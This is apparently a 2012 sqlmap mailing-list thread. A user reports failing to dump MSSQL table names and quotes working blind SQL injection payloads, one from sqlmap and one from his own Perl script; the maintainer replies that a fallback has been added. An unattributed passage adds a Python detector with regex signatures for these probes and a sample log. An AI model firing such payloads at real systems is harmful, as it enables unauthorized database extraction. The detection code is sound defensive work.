Thread: [sqlmap-users] Can't dump tables from an mssql server
From: cats <du...@al...> - 2012-01-02 19:17:13

I can dump users and databases, but not the tables in any database.

Here's some output from sqlmap:

Revision: 4643

[18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

[18:58:04] [INFO] fetching tables for database: productcatalog
[18:58:04] [INFO] fetching number of tables for database 'productcatalog'
[18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM eservice_productcatalog..sysobjects WHERE xtype IN (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
[18:58:05] [DEBUG] reflective value found and filtered out

It just goes on like this and simply spits out a "retrieved" which is empty, and it will continue doing so until it has reached the length of the current table. Thus the result will be something like:

dbo.""
dbo.""
dbo.""

...and so on

I wrote a Perl script that could successfully extract the tables from my database, using the following injection string.

Clean version of the injection:

AND (
    CASE
        WHEN SUBSTRING((
            SELECT TOP 1 TABLE_NAME FROM (
                SELECT TOP ' . $i . ' TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\' ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc . ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1

So the important part is "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects WHERE xtype = 'U'" doesn't seem to work for me.

Has anyone else had this issue?
Am I doing something wrong, or is this a bug in sqlmap?
Or maybe it's the configuration on my mssql server?

Anyway, advice is welcome :-)

Cheers!
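The sqlmap payload quoted above is a boolean-blind character probe, and the Perl variant is the same technique with CASE WHEN; either one shows up in a web server log as a long run of near-identical requests from one client, one per character or bit. The following Python detector is an added example (not from the thread, sqlmap, or the poster's script) that flags such probes in log lines; the log field order, client addresses and sample lines are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures drawn from the payloads quoted in the thread: sqlmap's
# ASCII(SUBSTRING(...)) probe, the CASE WHEN SUBSTRING(...) variant,
# MSSQL metadata sources, and the trailing 'x'='x tautology.
SIGNATURES = {
    "blind_char_probe": re.compile(r"ASCII\s*\(\s*SUBSTRING\s*\(", re.I),
    "case_when_probe": re.compile(r"CASE\s+WHEN\s+SUBSTRING\s*\(", re.I),
    "mssql_metadata": re.compile(r"\bsysobjects\b|INFORMATION_SCHEMA\.TABLES", re.I),
    "tautology_tail": re.compile(r"AND\s+'(\w+)'\s*=\s*'\1", re.I),
}

def score_request(query_string):
    """Return the names of all signatures matched by one URL-encoded query string."""
    decoded = unquote_plus(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def detect(log_lines, min_signatures=2, threshold=3):
    """Constructed log format (hypothetical, not the real IIS W3C field order):
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
    A request counts as a probe when it matches at least `min_signatures`
    signatures (a single keyword alone is too noisy); clients with `threshold`
    or more probes are reported, since blind extraction needs many requests."""
    probes = Counter()
    for line in log_lines:
        if line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        client, query = parts[2], parts[5]
        if len(score_request(query)) >= min_signatures:
            probes[client] += 1
    return {ip: n for ip, n in probes.items() if n >= threshold}

# Constructed sample: three probes from one client (the first is the payload
# quoted in the thread), plus benign traffic from another client.
SAMPLE_LOG = [
    "2012-01-02 18:58:04 203.0.113.5 GET /catalog.aspx id=99047'+AND+ASCII(SUBSTRING((SELECT+ISNULL(CAST(LTRIM(STR(COUNT(name)))+AS+NVARCHAR(4000)),CHAR(32))+FROM+eservice_productcatalog..sysobjects+WHERE+xtype+IN+(CHAR(117),CHAR(118))),1,1))+>+51+AND+'cfIC'='cfIC 200",
    "2012-01-02 18:58:05 203.0.113.5 GET /catalog.aspx id=99047'+AND+ASCII(SUBSTRING((SELECT+TOP+1+name+FROM+eservice_productcatalog..sysobjects),1,1))+>+57+AND+'cfIC'='cfIC 200",
    "2012-01-02 18:58:06 203.0.113.5 GET /catalog.aspx id=99047'+AND+(CASE+WHEN+SUBSTRING((SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES),1,1)=char(65)+THEN+1+ELSE+2+END)='1 200",
    "2012-01-02 18:58:07 198.51.100.7 GET /catalog.aspx id=99047 200",
    "2012-01-02 18:58:08 198.51.100.7 GET /search.aspx q=SUBSTRING+tutorial 200",
]

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))  # {'203.0.113.5': 3}
```

The thresholds are deliberately conservative; in practice the per-client count over a short window is the strong signal, because a single boolean-blind request looks like any other malformed parameter.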
From: Miroslav S. <mir...@gm...> - 2012-01-04 11:50:20

Hi Cats.

Please, wait for a day or two and you'll hopefully be able to use sqlmap in that case too.

Kind regards,
Miroslav Stampar

On Mon, Jan 2, 2012 at 8:01 PM, cats <du...@al...> wrote:
> [...]

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-01-09 20:56:50

Hi Cats.

This should be implemented this moment (as a backup plan if normal retrieval of table names fails for whatever (read: privileges) reason).

Kind regards,
Miroslav Stampar

On Wed, Jan 4, 2012 at 12:50 PM, Miroslav Stampar <mir...@gm...> wrote:
> [...]

--
Miroslav Stampar
http://about.me/stamparm